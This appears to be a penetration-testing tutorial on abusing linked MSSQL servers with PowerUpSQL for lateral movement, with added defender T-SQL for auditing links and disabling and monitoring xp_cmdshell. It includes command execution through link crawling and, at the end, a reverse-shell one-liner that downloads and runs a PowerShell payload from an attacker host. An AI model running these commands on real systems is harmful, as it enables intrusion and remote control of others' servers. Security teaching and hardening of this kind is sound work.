MSSQL Server Trust Abuse

Within Windows domains, MSSQL is deployed widely, often on dedicated servers that users from other machines connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement, because domain users can be mapped to database roles.

We can also take advantage of database links. SQL Servers within a network are often linked to each other, and those links give us a way to traverse the Active Directory network by executing commands indirectly on remote servers without leaving our current station. This works not only between domains that trust each other within a forest, but between separate forests as well.

These attacks can also go relatively undetected, because the commands run on distant SQL Servers while you stay on your own machine.

Enumeration

We can use PowerUpSQL (PowerUpSQL.ps1) to enumerate SQL Servers.

Finding SQL Server Instances With an SPN Registered on the Domain Controller and Discovering Logon Sessions

Get-SQLInstanceDomain

Finding Accessible SQL Servers

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Retrieve Basic Server Information From Each Target SQL Server Instance

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Searching Database Links

Get-SQLServerLink -Instance <sql_server_domain> -Verbose

# Crawl the database links reachable from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose
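The reason link crawling works is visible from the server side: a linked server carries its own login mapping, and when that mapping is a fixed remote login the query runs on the remote server as that stored account no matter who issued it locally. The following T-SQL audit is an added example for administrators checking their own instances; it is not part of the original notes or of PowerUpSQL. It uses only the catalog views sys.servers, sys.linked_logins and sys.server_principals; the link name in the clean-up commands at the end is a placeholder.

```sql
-- Added defender-side audit (not from the original notes): list every
-- outbound database link on this instance and how it authenticates.
SELECT
    s.name                               AS link_name,
    s.data_source                        AS remote_host,
    s.product,
    s.provider,
    s.is_rpc_out_enabled,                -- 1 = EXEC of remote procedures over the link is allowed
    s.is_data_access_enabled,            -- 1 = OPENQUERY / four-part names work over the link
    ISNULL(p.name, '<all other logins>') AS local_login,   -- local_principal_id 0 = default mapping
    l.uses_self_credential,              -- 1 = forward the caller's own identity
    l.remote_name                        AS mapped_remote_login,
    CASE
        WHEN l.uses_self_credential = 0 AND l.remote_name IS NOT NULL
            THEN 'fixed remote login: every local caller becomes this account, review'
        WHEN l.uses_self_credential = 0 AND l.remote_name IS NULL
            THEN 'no mapping: connection is refused'
        ELSE 'self-mapped: remote rights follow the caller'
    END                                  AS risk_note
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l
    ON l.server_id = s.server_id
LEFT JOIN sys.server_principals AS p
    ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation for a link that is no longer needed (name is a placeholder):
-- drop the link together with its stored login mappings.
EXEC sp_dropserver @server = N'LINK_NAME_HERE', @droplogins = 'droplogins';

-- For a link that must stay, refuse remote procedure execution over it,
-- which is what 'exec master..xp_cmdshell' through a link relies on.
EXEC sp_serveroption @server = N'LINK_NAME_HERE', @optname = 'rpc out', @optvalue = 'false';
```

Run the SELECT on each instance PowerUpSQL would reach and compare the mapped_remote_login column against the remote server's sysadmin membership: a fixed mapping to a privileged remote login is the hop a link crawl exploits, and is the first thing to replace with a least-privileged remote account or a self-credential mapping.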

Now We Can Execute Commands

Check the results under the 'CustomQuery' column of the output.

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"
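Command execution through a link depends on xp_cmdshell being enabled on the remote instance. The following T-SQL is an added example for administrators auditing, hardening and monitoring their own SQL Servers; it is not part of the original notes or of PowerUpSQL. The Extended Events session name and the .xel output path are assumptions; the predicate, events and actions it uses are standard SQL Server ones.

```sql
-- Added defender-side checks (not from the original notes).
-- Step 1: see whether OS command execution is reachable on this instance.
-- value_in_use = 1 for xp_cmdshell means sysadmin logins (and any login
-- granted EXECUTE on it with a proxy account) can run OS commands here,
-- including callers arriving through an inbound database link.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- Step 2: disable xp_cmdshell (the expected hardened state). The option is
-- advanced, so 'show advanced options' is raised only for the change.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;  RECONFIGURE;
GO

-- Step 3: detection. Log every batch or RPC call that mentions xp_cmdshell,
-- with the login, client host and application, so an attempt to enable or
-- use it (locally or over a link) leaves a record even if it fails.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = 'xp_cmdshell_watch')
    DROP EVENT SESSION [xp_cmdshell_watch] ON SERVER;
GO
CREATE EVENT SESSION [xp_cmdshell_watch] ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.username, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%xp_cmdshell%')
),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.username, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%xp_cmdshell%')
)
ADD TARGET package0.event_file (SET filename = N'C:\XEvents\xp_cmdshell_watch.xel');  -- path is an assumption
GO
ALTER EVENT SESSION [xp_cmdshell_watch] ON SERVER STATE = START;
GO

-- Step 4: review what was captured (same placeholder path as above).
SELECT CAST(event_data AS xml) AS event_data
FROM sys.fn_xe_file_target_read_file('C:\XEvents\xp_cmdshell_watch*.xel', NULL, NULL, NULL);
```

Because a crawled query arrives at the remote instance as an ordinary batch or RPC from the linked server's provider, the session captures it on the server that actually runs the command; the client_hostname action then points at the intermediate SQL Server rather than the operator's workstation, which is the trail to follow back through the links listed by the previous audit.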

Get a Reverse Shell

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"

Last updated 3 years ago